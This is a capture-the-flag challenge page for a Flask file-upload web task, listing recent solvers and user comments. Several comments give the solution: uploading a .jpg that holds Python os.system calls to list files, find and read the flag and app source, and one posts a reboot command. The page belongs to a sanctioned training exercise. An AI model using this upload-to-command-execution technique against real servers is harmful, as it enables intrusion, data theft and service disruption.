Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
⎝Lazzaro⎠
一血奖励:
3金币
解 决:
11024
提 示:
描 述:
Flask_FileUpload
评分(19)
解题动态
CLX1216115 攻破了该题 3小时前
ArthurMorgan 攻破了该题 3小时前
montgo 攻破了该题 3小时前
江户川 攻破了该题 3小时前
1554701214 攻破了该题 16小时前
13627713954 攻破了该题 17小时前
viator 攻破了该题 17小时前
to5ny 攻破了该题 21小时前
小白出道 攻破了该题 22小时前
foamsn 攻破了该题 22小时前
Testman 攻破了该题 22小时前
2875517502 攻破了该题 23小时前
scicoc 攻破了该题 23小时前
star_evil 攻破了该题 1天前
sscx_xxy 攻破了该题 1天前
2276491734 攻破了该题 1天前
salmon 攻破了该题 1天前
林士仲11 攻破了该题 1天前
19163302825 攻破了该题 1天前
评论
Adaneo 1年前
举报
python代码执行,f12源代码中有执行的结果显示。神奇的代码,大佬就是大佬啊!
3055 1年前
举报
import os 换行 os.system('cat /flag')
DragonFly 1年前
举报
import os os.system("reboot")
tomcatkeep 1年前
举报
("c2hhYmkgc3VucmVuYnVsaWpp")
k19551429 1年前
举报
场景有问题
Hobin 1年前
举报
这个写wp的人很厉害啊
Hobin 1年前
举报
这个写wp的人很厉害啊
TamiQ 1年前
举报
vi test.jpg 内容是 import os os.system('find / -name flag') 然后吧test.jpg上传上去,看下响应中flag文件的位置,然后把jpg的内容改成cat flag的位置,就可以了
wangning 1年前
举报
我们首先建一个test.py的文件,内容是python代码 import os os.system('ls -la'),因为只能上传jpg/png的格式,所以我们把文件名修改成test.jpg,系统会返回当前文件夹,以此我们得出结论,上传文件可以执行命令,我们用burp抓包,我们把代码改成 import os os.system('cat /flag'),放包,按F12就可以看到flag
kygahd 1年前
举报
我的方法是, 首先建个test.jpg 文件, 内容是python代码 import os os.system('ls -la') 执行系统命令列出当前文件夹的所有文件 用burp上传以后返回的结果里发现当前文件夹有app.py. 然后修改test.jpg 为 import os os.system(“cat ./app.py”) 来查看网站源码。 源码里发现一段代码为 shell('ec
Epiphany777 1年前
举报
jpg\png python 抓包 import os os.system('cat /flag')